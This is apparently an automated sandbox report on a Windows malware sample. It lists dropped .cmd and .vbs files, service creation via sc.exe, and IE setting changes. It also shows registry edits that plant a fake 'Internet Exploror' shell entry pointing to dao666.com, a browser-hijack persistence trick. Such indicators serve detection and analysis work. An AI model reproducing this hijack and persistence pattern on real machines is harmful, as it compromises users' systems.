Analysis Overview
SHA256
df8109601b236f59b077559a4db4ef7938f119d23fbbc75185974dfa1a030764
Threat Level: Likely malicious
The file 8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Checks computer location settings
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
System Service Discovery
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Runs net.exe
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 08:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 08:26
Reported
2024-11-03 08:29
Platform
win7-20240903-en
Max time kernel
118s
Max time network
128s
Command Line
Signatures
Creates new service(s)
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files\WindWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\to.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\to.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WindWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WindWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Mail\UltraEdlt\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdlt\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Mail\UltraEdlt\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdlt\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc500000000002000000000010660000000100002000000089104b12bf2525b961d671977ef410c0a85ec573f22df8ec4aa4a53adca29427000000000e8000000002000020000000b82605beb8166ab835b48c1f59e26693b64efda809c5a7a44f6a7afb4c9e889720000000a52167cc58a32464206973d9b86dba6ffdd9405a3cc235779a93adff139780a34000000090b6ee9a4a500170a309cf7aeb65d95ca246ac215b6776724fa47285a9bf74190d721b07c7e7d9de3867f289e6df9a352cadac55a4a71f192976d79e84a92884 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000201b514c33397c3c4070c9e8b955e36965ec49196acfce249d8f8d8db8a15f3b000000000e800000000200002000000026112cded95900ba916098e08661a692ef02c47eba06ffbe2232bc580db9f6cc90000000c01787ddc5b36463d85727db7ace7aed79fa1dc9684265c0b2c294f77d9e52b372c27b38c5b7f59c42ed099c1a30a3f407398fb9504716a126fe5e17ba1208bea486166bd51c7ee84726aac2c43da41913abddbd5badc6be7024325e545b072288facb9f0acb59227305d67005cbcff1673c3aba9f178d6ffc4937abfb12c14c0a24768f0f0dfb3bd1027710ac9224d0400000001bd318a4c1f70e33f59fdc8e207e437786a09b68c3096cee82c696774733f897b70017f0d341c46490fa4d9d673d017add52808e391ef985d620d753f620a085 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436784274" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5D6D46B1-99BD-11EF-B729-F2BBDB1F0DCB} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30900b37ca2ddb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://dao666.com/?ha" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror" | C:\Windows\SysWOW64\reg.exe | N/A |
